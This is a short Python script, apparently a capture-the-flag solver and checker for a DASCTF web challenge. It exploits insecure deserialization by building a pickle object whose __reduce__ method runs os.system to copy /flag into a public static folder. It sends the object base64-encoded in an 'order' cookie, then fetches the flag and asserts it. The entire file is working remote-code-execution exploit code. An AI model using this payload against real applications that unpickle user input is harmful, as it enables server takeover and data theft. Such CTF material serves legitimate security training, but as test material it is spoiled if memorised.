#!/usr/bin/python
# -*- coding: utf-8 -*-
import re, sys, requests
import pickle
import base64
import time

HOST, PORT, FLAG = sys.argv[1:4]

def exp(ip, port):
    url = f"http://{ip}:{port}"
    
    class RCE:
        def __reduce__(self):
            import os
            return os.system, ('cat /flag > /app/static/flag.txt',)
    
    payload = base64.b64encode(pickle.dumps(RCE())).decode()
    
    cookies = {'order': payload}
    r = requests.get(f"{url}/order", cookies=cookies)
    
    time.sleep(1)
    
    flag_response = requests.get(f"{url}/static/flag.txt")
    flag = re.findall('DASCTF{(.*?)}', flag_response.text)[0]
    return flag

if __name__ == '__main__':
    assert exp(HOST, PORT) == FLAG
    print("Pass!")